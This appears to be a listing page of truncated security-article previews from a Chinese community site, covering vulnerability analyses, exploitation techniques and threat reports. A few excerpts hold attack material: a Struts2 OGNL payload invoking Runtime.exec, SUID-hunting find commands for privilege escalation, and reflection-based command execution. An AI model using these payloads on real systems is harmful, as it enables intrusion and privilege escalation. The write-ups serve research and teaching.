# 【漏洞分析】iPhone 播放视频自动关机“奇葩”漏洞成因分析 | ##### 译文声明 本文是翻译文章,文章来源:安全客 译文仅供参考,具体内容表达以及含义原文为准。 **作者:**[ **Proteas@** **360 Nirvan Team**](http://bobao.360.cn/member/contribute?uid=2577449118) **预估稿费:500RMB(不服你也来投稿啊!)** **投稿方式:发送邮件至**[ **linwei#360.cn**](mailto:linwei@360.cn) **,或登陆**[ **网页版**](http://bobao.360.cn/contribute/in...
社区文章
## 前言 在某次和地方组织前期渗透侦查中(已授权), 通过/.git/获取到网站源码,查看配置文件发现该系统使用OSS进行文件存储,但是网站迟迟shell不下。通过.git对文件进行恢复,得到信息如下: 1.网站部分源码,但是审计相当耗时。 2.查看配置文件发现数据库采用阿里云RDS,且阿里云RDS为内网地址。 3.网站对文件上传采用OSS进行文件存储。 如果是你,shell拿不到,RDS仅对内,3306端口不通,SQL注入,RCE等常见漏洞又没有,改怎么办? ## 信息收集 配置信息如下: ACCESSKEYID=XXXXX ACCESSKEYSECRET=XXXXX ENDPOINT=oss...
社区文章
# Operation Poisoned News:针对香港用户的水坑攻击 ##### 译文声明 本文是翻译文章,文章原作者 trendmicro,文章来源:blog.trendmicro.com 原文地址:<https://blog.trendmicro.com/trendlabs-security-intelligence/operation-poisoned-news-hong-kong-users-targeted-with-mobile-malware-via-local-news-links/> 译文仅供参考,具体内容表达以及含义原文为准。 ## 0x00 前言 研究人员最近发现了针对香港iOS用户的水坑攻击,攻击者在...
社区文章
作者: [Hcamael@知道创宇404实验室](http://0x48.pw) 发布时间:2017-07-25 fastbin相关的堆知识我一年前就学过了,但是都没写啥记录文档,又咸鱼了好长一段时间,要捡回来这块的知识,又重新开始学习了一遍,这篇博文中记录下我对fastbin的个人理解。 #### 基础知识研究 当使用malloc函数第一次向系统申请小于128kb的内存时,会通过sys_brk申请132kb的内存,这块内存就称为堆。 写个测试代码,对着测试代码进行分析(64位系统): # test.c # gcc test.c -o test #include <stdio.h> #includ...
社区文章
# 前言 Mustache被称为无逻辑的Ruby模板;然而,当客户端提供的模板呈现在服务器端时,会带来一些意想不到的副作用。 这篇文章探讨了在Ruby web应用程序中发现一种(有点有限的)RCE形式,导致终端用户能够控制正在使用的Mustache模板变量。利用此RCE能够读取和删除所有客户数据,并且可能扩展为用来执行shell命令。 提醒大家,这不是Mustache库或语法的漏洞,而是目标网站滥用库导致的RCE。 赏金计划目前不允许披露漏洞-鉴于bug的性质,可以使用一些Ruby示例来模拟漏洞。 # Mustache模板简介 在例子中,我们将使用[Ruby Mustache包](https://github.com/m...
社区文章
# 勒索软件正成为制马人的新方向 | ##### 译文声明 本文是翻译文章,文章来源:360移动安全团队 译文仅供参考,具体内容表达以及含义原文为准。 2016年5月13日 目 录 引言.. 1 第一章木马分析.. 2 一、木马样本分析.. 2 二、短信链接分析.. 3 第二章制马人分析.. 7 一、制马人行为分析.. 7 二、制马人信息.. 13 第三章影响与趋势.. 15 一、关联样本.. 15 二、收益情况.. 15 三、裂变式传播.. 16 四、交叉式传播.. 17 附录一:参考资料.. 18 引言 4月份360 移动安全团队发布的《Android勒索软件研究报告》详细揭露了目前国内Android勒索软件黑色产业链情况。其中...
社区文章
# Docker for Windows本地提权漏洞分析与利用 ##### 译文声明 本文是翻译文章,文章来源:srcincite.io 原文地址:<https://srcincite.io/blog/2018/08/31/you-cant-contain-me-analyzing-and-exploiting-an-elevation-of-privilege-in-docker-for-windows.html> 译文仅供参考,具体内容表达以及含义原文为准。 ## 一、前言 我一直在寻找常见应用程序中是否存在可以用来突破Windows系统的漏洞,今年3月份我发现了一个有趣的漏洞,值得与大家一起分享。虽然内核漏洞的发现过程非常吸...
社区文章
# java反射 首先,反射通常是通过class方法生成的class对象,所以可以使用比如runtime下没有而class下有的方法。比如序列化,runtime是生成对象是无法序列化的,但是class可以。所以一般都要通过class进行反序列化 ## getMethod利用实例化对象方法实例化对象 * 方法.invoke(对象,参数)调用该对象下的方法 Runtime下的构造函数是私有的,只能通过Runtime.getRuntime()来获取Runtime对象。 * getMethod通过反射获取一个类的公有方法(因为重载的存在不能直接确定函数)。而invoke和getMethod的区别就是invoke会执行函数。 ...
社区文章
来源:[先知安全技术社区](https://xianzhi.aliyun.com/forum/read/2163.html "先知安全技术社区") 作者:nearg1e@YSRC PIL (Python Image Library) 应该是 Python 图片处理库中运用最广泛的,它拥有强大的功能和简洁的 API。很多 Python Web 应用在需要实现处理图片的功能时,都会选择使用 PIL。 PIL 在对 eps 图片格式进行处理的时候,如果环境内装有 GhostScript,则会调用 GhostScript 在 dSAFER 模式下处理图片,即使是最新版本的PIL模块,也会受到 `GhostButt CVE-2017-82...
社区文章
# 浅论密钥重装攻击KRACK ##### 译文声明 本文是翻译文章 译文仅供参考,具体内容表达以及含义原文为准。 KRACK即为Key Reinstallation Attacks,中文译为密钥重装攻击。是由比利时鲁汶大学信息安全研究人员Mathy Vanhoef提出的一种针对WPA2的攻击方式。 Mathy Vanhoef ## 时间线 • 2017.5.19 论文被提交 • 2017.6.16 向攻击涉及的供应商发出通告 • 2017.8.28 CERT/CC向所有供应商发出通告 • 2017.10.15 作者在https://www.krackattacks.com公开披露细节,并演示了一个攻击实例 • 2017.11.1...
社区文章
# MOSEC议题解读 | Build your own iOS kernel debugger | ##### 译文声明 本文是翻译文章 译文仅供参考,具体内容表达以及含义原文为准。 ## 议题概要 Ian Beer在这次议题中介绍了如何针对零售版的iOS设备开发一个内核调试器。议题的内容会涵盖ARM64底层在XNU中的异常处理,KDP远程调试的协议以及如何在不修改内核代码的前提下打造一个支持设置断点的本地内核调试器。 ## 作者介绍 Ian Beer在Google的Project Zero团队从事漏洞挖掘与利用的相关研究。 ## 议题解析 ### 历史与现状 在旧版本的iOS内核中支持KDP,并且通过一些bootrom和kern...
社区文章
2022年8月27日至28日,盛夏落幕,初秋刚至。在万物更替的时节,KCon以全新的形式庆贺了十一周岁的生日。前十年,KCon一直行走在探索与分享网络攻防技术的道路上,也收获了众多同伴的支持。第十一年,KCon迈步新生,以“+1”的决心和动作开启了新十年。 2022年 KCon首次采用全线上直播且免费参与的方式,中国信息安全、嘶吼、数说安全、蘑菇云4家媒体同步线上转播。两天时间,热情观众为KCon进行数万次点赞和数千条评论以及分享。大家在互动区实时互动,为讲师积极打call,踊跃提问,即时进行技术的交流,直播间一派火热气氛。 本届 KCon 已画上圆满的句号,虽然本届大会是以线上形式举办,仍旧获得了朋友们热情的关注与支持。为了方便后...
社区文章
作者:k2yk 日期:2017/11/13 最后更新日期:2017/11/15 ### 0x00 漏洞描述 在 2017 年 11 月 12 日 NVD公布了关于 wget 的多个漏洞的情报,这里做一个wget缓冲区溢出漏洞的分析。在 wget 版本小于1.19.2 的情况下,wget 在处理重定向时,会调用 `http.c:skip_short_body()`函数, 解析器在解析块时会使用 `strtol()` 函数读取每个块的长度,但不检查块长度是否为非负数。解析器试图通过使用 `MIN()`函数跳过块的前512个字节,最终传递参数到 `connect.c:fd_read()`中。由于 `fd_read()`仅会接受一个...
社区文章
# 梨子带你刷burpsuite靶场系列之客户端漏洞篇 - 点击劫持专题 | ##### 译文声明 本文是翻译文章 译文仅供参考,具体内容表达以及含义原文为准。 ## 本系列介绍 > > PortSwigger是信息安全从业者必备工具burpsuite的发行商,作为网络空间安全的领导者,他们为信息安全初学者提供了一个在线的网络安全学院(也称练兵场),在讲解相关漏洞的同时还配套了相关的在线靶场供初学者练习,本系列旨在以梨子这个初学者视角出发对学习该学院内容及靶场练习进行全程记录并为其他初学者提供学习参考,希望能对初学者们有所帮助。 ## 梨子有话说 > > 梨子也算是Web安全初学者,所以本系列文章中难免出现各种各样的低级错误,还请各...
社区文章
## 前言 最近入坑了PHP代码审计,从网上下了几套CMS尝试着练习一下,不得不说现在还在更新的大多数CMS安全性还是不错的,动不动就是源代码加密,配置360、阿里云的过滤文件。。。还好折腾了一段时间后在一个CMS中发现了CSRF漏洞,也算是对这一阵子的学习有一个交代。 ## 场景复现 后台页面 我们看一下添加系统用户的后台处理代码 public function addUser() { if (IS_POST) { //用户组 $group_id = I('group_id', array()); $...
社区文章
**作者:王铁磊** **原文链接:<https://mp.weixin.qq.com/s/Lj8c5PLzLGIfdBoDzairsQ>** ## 1 引言 虚拟内存 (Virtual Memory, VM) ⼦系统是现代操作系统基础核⼼组件,不仅负责虚拟地址和物理内存的映射关系,管理调度物理内存的使⽤,为程序开发提供统⼀透明的地址空间,同时也要为不同执⾏环境提供隔离,管控物理页⾯读、写、执⾏等权限,是系统安全的基⽯。由于VM⼦系统需要同时兼顾性能、效率、透明性和安全等⽬标,导致VM⼦系统在实现过程中逻辑⼤多异常复杂,VM⼦系统中的各种优化策略也就成了"逻辑错误"类型漏洞的重灾区。 本⽂以iOS、macOS操作系统的内核XNU...
社区文章
2019.1.5 下午三点到达图书馆 ### 0x01 前期了解 看先知phpoop师傅又双叒贡献了关于74cms的一个洞 好奇一下这个CMS 于是测一下咯。 Code:<http://www.74cms.com/download/index.html> Version:`74cms_Home_Setup_v4.2.3 这里不知道为什么4.2.3的发布日期为什么会比4.2.1x的早 前期了解: 看了先知phpoop师傅的文章和百度一些资料 注入感觉被挖得差不多了 试试别的。 ### 0x02 测试过程 测试环境:`MacOS 10.14` \+ `MAMP Pro` \+ `BurpSuite` \+ [`FileMonitor...
社区文章
# HTTP协议攻击方法汇总(下) ##### 译文声明 本文是翻译文章 译文仅供参考,具体内容表达以及含义原文为准。 最近一段时间,部门的小伙伴们看了一些HTTP协议相关的攻击方法,现做一个汇总。 由于内容比较多,分上下两部分进行发布。 上半部分:<https://www.anquanke.com/post/id/224321> 下半部分内容: 《Web Cache Attack》作者:donky16 《RangeAMP放大攻击》 作者: fnmsd ## Web Cache Attack Web缓存欺骗和Web缓存投毒攻击方式 作者:donky16[@360](https://github.com/360 "@3...
社区文章
# 分析CVE-2018-8581:在Microsoft Exchange上冒充用户 | ##### 译文声明 本文是翻译文章,文章原作者 zerodayinitiative,文章来源:zerodayinitiative.com 原文地址:<https://www.zerodayinitiative.com/blog/2018/12/19/an-insincere-form-of-flattery-impersonating-users-on-microsoft-exchange> 译文仅供参考,具体内容表达以及含义原文为准。 ## 前言 这是我们2018年Top 5趣案系列中的第三个案例。这些漏洞都有一些因素使它们从今年发布的大约...
社区文章
作者:[Evi1cg](https://evi1cg.me/archives/SUID_Privilege_Escalation.html "Evi1cg") Linux提权中,可以用的SUID文件来提权,SUID的作用就是:让本来没有相应权限的用户运行这个程序时,可以访问没有权限访问的资源。通常可以使用一下命令来找有SUID标志位的文件: find / -user root -perm -4000 -print 2>/dev/null find / -perm -u=s -type f 2>/dev/null find / -user root -perm -4000 -exec ls -ldb {} \;...
社区文章
# 安卓Native层共享库fuzzing技术思路及实践 ##### 译文声明 本文是翻译文章 译文仅供参考,具体内容表达以及含义原文为准。 ## 前言 fuzzing技术在漏洞挖掘领域是一个无法绕开的话题,无恒实验室也一直在使用fuzzing技术发现产品的问题。虽然fuzzing不是万能的,但是没有它是万万不能的。说它不是万能的其实也是相对的说法,理想状态下,例如在可接受的时间范围内,计算资源足够丰富且系统复杂度足够低的情况下,fuzzing就能够给你任何想要的结果。这就好像是让一台计算机去随机的print一些文字,只要时间足够长,随机字符产生的效率足够快,那么早晚有一天会print出一部《三体》出来。 然而理论是丰满的,现实是...
社区文章
# 3月28日热点 - Meltdown补丁再出问题,允许用户级程序读取内核数据 ##### 译文声明 本文是翻译文章 译文仅供参考,具体内容表达以及含义原文为准。 ## 资讯类 微软Meltdown补丁引发更大的安全漏洞,允许任何用户级应用程序从操作系统内核读取内容,甚至将数据写入内核内存 <https://www.bleepingcomputer.com/news/microsoft/meltdown-patch-opened-bigger-security-hole-on-windows-7/> 新的CPU侧信道攻击——BranchScope <https://www.bleepingcomputer.com/news/sec...
社区文章
# 4月17日安全热点 - 安全违规调查:2017年全球“丢失”数据26亿条 ##### 译文声明 本文是翻译文章 译文仅供参考,具体内容表达以及含义原文为准。 360-CERT 每日安全简报 2018-04-17 星期二 ## 【漏洞】 1.英特尔SPI Flash中存在缺陷,攻击者能更改或删除BIOS/UEFI固件 <http://t.cn/RmQjA2M> 2.Thinkphp3.2.3最新版update注入漏洞 <http://t.cn/RmQ9zM0> 3.CVE-2018-0737 OpenSSL:密钥生成过程中恢复RSA私钥 <http://t.cn/RmR0CFW> ## 【恶意软件】 1.恶意软件使用D...
社区文章
## 漏洞描述 Spring Cloud Config,2.2.3之前的2.2.x版本,2.1.9之前的2.1.x版本以及较旧的不受支持的版本允许应用程序通过spring-cloud-config-server模块提供任意配置文件。恶意用户或攻击者可以使用特制URL发送请求,这可能导致目录遍历攻击。 Spring cloud Config已经出现过两次目录穿越漏洞,分别是CVE-2019-3799和CVE-2020-5405,可参考之前的文章:`https://xz.aliyun.com/t/7558`。 ## 漏洞补丁 这次补丁主要是两个部分,第一个部分是将对路径的检测方法单独的封装了出来,封装到了PathUtils类中,并且做了...
社区文章
# 太湖杯密码学 Aegis 题解 | ##### 译文声明 本文是翻译文章 译文仅供参考,具体内容表达以及含义原文为准。 ## Aegis 整个出题的题目参考了googlectf 2020 Oracle的题目。由于考虑到比赛时长的问题(其实是作者比较菜),基本上是将其中的一个考点拿了出来修改成了当前的题目。针对那个题目比较完整的解法可以参考[这里](https://github.com/nguyenduyhieukma/CTF-Writeups/blob/master/Google%20CTF%20Quals/2020/oracle/oracle-solution.ipynb) 这个地方也有这个算法的比较详细的解释。 ### 算...
社区文章
# 【技术分享】HackerOne第三季度TOP 5 漏洞报告 | ##### 译文声明 本文是翻译文章,文章来源:hackerone 原文地址:<https://hackerone.com/blog/top-vulnerability-reports-of-3Q-2016> 译文仅供参考,具体内容表达以及含义原文为准。 **翻译:**[ **sinensis** ****](http://bobao.360.cn/member/contribute?uid=2642794559) **稿费:170RMB(不服你也来投稿啊!) ** **投稿方式:发送邮件至linwei#360.cn,或登陆[ **网页版**](http://b...
社区文章
# “正版”监控软件被黑产利用,输出把关不严或成另一个TeamViewer? ##### 译文声明 本文是翻译文章 译文仅供参考,具体内容表达以及含义原文为准。 ## 概述 近日,奇安信病毒响应中心在日常跟踪黑产团伙过程中,发现了一个利用正规监控软件窃取用户信息,甚至监控聊天记录的黑客团伙,由于正规监控软件带有数字签名,杀软一般不会对其进行查杀,从而达到免杀的效果。 样本在执行过程中会在从远程服务器下载远控客户端安装程序,通过消息操作实现客户端自动化安装,安装成功后主进程则会连接远程服务器。可以实现屏幕监控、流量监控、屏幕录像、监控上网行为、软件管理、访问控制、文档备份、下发文件等复杂功能,同时其释放的驱动注册了进程回调来保护主进程...
社区文章
为什么要写这个文章呢?因为我发现很多白帽子,甚至很牛逼的(代码能力远远比我厉害)都没这样玩过,因为很多次项目项目基本上在大家没输出情况下这些小技巧让我收获了很多不少漏洞。当然也许大佬们是看不起这些小漏洞小技巧,我写的目的是为了那些大部分懒人,或者基本没深入了解开发的不深入理解代码的能快速绕过简单web签名。最后分享一些实战中的小tips。希望帮助更多的新鲜血液的白帽子多赚钱,官网说法是多为了国家信息安全做贡献。(本文章是站在绝对黑盒的思路) 1 通过替换响应包的值绕过签名 2 通过chromedebug绕过签名 3 web渗透测试中一些简单的单身超级实用的tips; # **通过替换响应包的值绕过签名** ...
社区文章
# 【技术分享】基于社交网络(Twitter和Facebook)的 渗透测试盒子 | ##### 译文声明 本文是翻译文章,文章来源:zone13.io 原文地址:<https://zone13.io/post/social-media-based-pentest-dropbox/> 译文仅供参考,具体内容表达以及含义原文为准。 **** **** 翻译:[Brexit](http://bobao.360.cn/member/contribute?uid=347422492) 预估稿费:100RMB 投稿方式:发送邮件至[linwei#360.cn](mailto:linwei@360.cn),或登陆[网页版](http://bob...
社区文章
项目地址:<https://github.com/tengzhangchao/microsoftSpider> 直接clone项目就可以用了,db文件在项目中(已收集了2010-2017所有的ms漏洞)。 文件中有ms号对应每个版本操作系统的kb号以及补丁链接地址,可以用来在提权时,写个脚本跑系统未安装的补丁所对应的ms号
社区文章
补丁: <https://gitee.com/ComsenzDiscuz/DiscuzX/commit/41eb5bb0a3a716f84b0ce4e4feb41e6f25a980a3> 可跨协议打 缺点: 由于payload构造中有第二次跳转,所以要求对方服务器的127.0.0.1:80也是dz PHP版本: php ver > 5.3 ## 触发漏洞点 漏洞点: source/module/misc/misc_imgcropper.php:55 $prefix = $_GET['picflag'] == 2 ? $_G['setting']['ftp']['attachurl'] : $_G['setting']...
社区文章
# 关于命令注入的测试payload生成 先知技术社区独家发表本文,如需要转载,请先联系先知技术社区授权;未经授权请勿转载。 先知技术社区投稿邮箱:Aliyun_xianzhi@service.alibaba.com; ## 示例 <?php     $site = $_GET["site"];     $command = 'ping '.$site;     $out = shell_exec($command)     echo $out; ?> 以上代码存在明显命令注入漏洞 简单构造 `site=xx.com;attack;` 即可达到执行任意attack命令的目的 再看...
社区文章
### 0x01 前言 #### 《java反序列化利用链自动挖掘工具gadgetinspector源码浅析》 github:[改造过的gadgetinspector](https://github.com/threedr3am/gadgetinspector "改造过的gadgetinspector") 我的上一篇文章,详细地讲述了gadgetinspector挖掘java反序列化利用链的原理,在明白了gadgetinspector的原理细节后,我们其实会发现它还存在着一部分的缺点: 1. 对于运行时确定的实现,也就是多态性,没办法做到污点分析: gadgetinspector.PassthroughDiscovery.P...
社区文章
# Android https过反抓包的一些总结 ##### 译文声明 本文是翻译文章 译文仅供参考,具体内容表达以及含义原文为准。 ## 大家在分析app的协议时,经常会遇到一些app存在反抓包,增加逆向难度。下面小弟我就分情况讨论一下如何解决反抓包问题。 #### 情况1:抓包工具无法抓到包,但app可以正常联网使用 可能原因:app内部使用的非http协议,可能是websocket或是tcp协议(qq,微信,百度贴吧等) 解决方案:对于这种情况,只能逆向app进一步去分析底层的二进制协议,暂无其他方法 可能原因:app内部设置了http协议不走代理流量(支付宝,美团等) 解决方案:可以使用一些第三方代理app(如Drony...
社区文章
# Hackthebox-Pit靶机渗透笔记 | ##### 译文声明 本文是翻译文章 译文仅供参考,具体内容表达以及含义原文为准。 > 目标IP:10.10.10.241 > > 本机IP:10.10.16.12 ## 前言 本文主要想记录一下对HackTheBox靶机Pit的渗透过程,涉及以下知识点: 1.snmp和snmpwalk工具使用 2.CVE-2019-12744 3.利用本地环境写入authorized_keys文件实现ssh免密登录root 难度中上,文中如果表述或者操作有问题欢迎各位师傅指出 ## 信息收集 **nmap** 开放了22、80、9090端口,还是从80端口开始看 访问`10.10.10.241:8...
社区文章
# 第四届“强网”拟态防御国际精英挑战赛web的wp | ##### 译文声明 本文是翻译文章 译文仅供参考,具体内容表达以及含义原文为准。 ## web ### **zerocalc** readFile函数可以任意文件读取! `readFile('./src/index.js')`读出源码后: notevil是最新的版本!正当我头脑风暴的时候! `readFile('../../../../../../flag')` 可以直接读出`flag` ### **new_hospital** 这题打开是一个正常的网站! 测试了网站功能时发现`feature.php` 好像存在任意文件读取! API的值是文件名base64加密后的值! i...
社区文章
# MAR DASCTF明御攻防赛 PWN、RE Writeup ##### 译文声明 本文是翻译文章 译文仅供参考,具体内容表达以及含义原文为准。 比赛最后拿到了第二名(密码👴带我飞),作为队伍中的PWN & RE选手,赛后复现了一下全部RE题目和两题PWN。 ## PWN部分 ### fruitpie 程序代码非常简单,申请一个任意size的堆块,然后告诉你堆块的地址,并且让你在堆块附近写入10字节的。 **解题思路** **1.MMAP申请堆块** 我们知道当我们malloc一个大的堆块(0x200000)时就会使用mmap来分配堆块,此时堆地址紧挨libc,我们可以根据输出的堆块地址,来计算出libc的基址。 **2....
社区文章
## 工程实现 ### 启发式识别被展平的函数 事实证明,二进制文件中的一些非库函数未被展平。我设计了一种启发式方法来确定给定函数是否被展平。被展平的函数将块号变量与jz和jg指令中的数字常量进行比较,这些数字常量似乎是伪随机生成的。有了这种特征就可以编写用于启发式确定某个函数是否被展平的算法。 1.遍历函数中的所有microcode。 2.对于每一个将变量和常数比较的jz/jg指令,记录相应的信息(变量,变量和常量比较的次数,对应的所有常量)。 3.选择被比较次数最多的变量对应的所有常量。 4.计算常量中为1的位数然后除以总位数,因为这些常量应该是伪随机生成的,所以这个值应该接近0.5。如果这个值在0.4和0.6之...
社区文章
# 攻击活动 攻击者伪造出钓鱼邮件来伪装成美国国家公共事务部官员分享的一份官方文档。链接指向的是一个含有武器化的Windows快捷方式文件的zip文件,Windows快捷方式文件位于一个看似合法的域名jmj.com。快捷方式文件是用来执行PowerShell命令的,命令可以读取、解码和执行快捷方式文件以外的代码。 执行后,快捷方式文件会释放一个非恶意的公开的美国国务院表格和Cobalt Strike Beacon。Cobalt Strike是一款商业化的渗透测试工具框架。BEACON payload被配置为修改过的"Pandora" Malleable C2 Profile变种,而且使用了C2域名pandorasong[.]com作...
社区文章
> window.postMessage()方法保证窗口对象之间的安全跨域通信;例如,在页面和它产生的弹出窗口之间,或者在页面和嵌入其中的iFrame之间。 更多关于window.postMessage()方法的知识可以查阅[Mozilla PostMessag](https://developer.mozilla.org/en-US/docs/Web/API/Window/postMessage "Mozilla PostMessag")e文档 如果想了解更多关于postMessage和跨域通信的知识,可以动一动小手戳以下链接 [How cross window/frame communication happens in J...
社区文章
# glibc 2.29引入 stash 机制后引起的相关漏洞学习 ##### 译文声明 本文是翻译文章 译文仅供参考,具体内容表达以及含义原文为准。 以下示例的libc源码均为libc2.31. ## fastbin的stash机制 这里分析一下对于fastbin的stash机制 if ((unsigned long)(nb) <= (unsigned long)(get_max_fast())) //size在fastbin范围内 { idx = fastbin_index(nb); mfastbinptr *fb = &fastbin(av, idx); ...
社区文章
# 方程式组织EQUATION DRUG平台解析(提纲) | ##### 译文声明 本文是翻译文章,文章来源:安天实验室 原文地址:<http://www.antiy.com/response/EQUATION_DRUG/EQUATION_DRUG.html> 译文仅供参考,具体内容表达以及含义原文为准。 **PDF 报告下载:链接:**[ **http://pan.baidu.com/s/1nvdirzz**](http://pan.baidu.com/s/1nvdirzz) **密码:wsvo** ** ** **1\. 背景** 对于“方程式组织”,在过去的两年中,安天已经连续发布了三篇分析报告:在《修改硬盘固件的木马——...
社区文章
# 前因 weblogic 2729过去了这么久,一开始只有10.3.6的版本exp以及分析公开,现在12.1.3 exp也在阿里白帽大会公布了,于是分析一下。 # 分析过程 ## soucre 拿10.3.6的payload来打,发现报错。 无法使用`UnitOfWorkChangeSet`这个类,12.1.3已经没有这个类了。 weblogic 2715禁止使用class标签了,通过`DocumentHandler`查看是否还有其他标签和属性是否可用。 jdk1.7比jdk1.6多了几个标签。看看有什么利用 ### property标签 网上有例子,并且官方有文档解释。 <https://docs.oracle.com/cd/E...
社区文章
这篇文章的重点不在于分析漏洞,而是通过漏洞去分析struts2沙箱的防护以及绕过,注意本文的struts2的版本范围与漏洞影响的范围是不对应的,只是顺序问题。 然后本文环境是使用的kingkk师傅仓库的`https://github.com/kingkaki/Struts2-Vulenv/tree/master/S2-015` ### s2-013 payload ${(#_memberAccess["allowStaticMethodAccess"]=true).(@java.lang.Runtime@getRuntime().exec('open /Applications/Calculator.app'))} 这个漏洞...
社区文章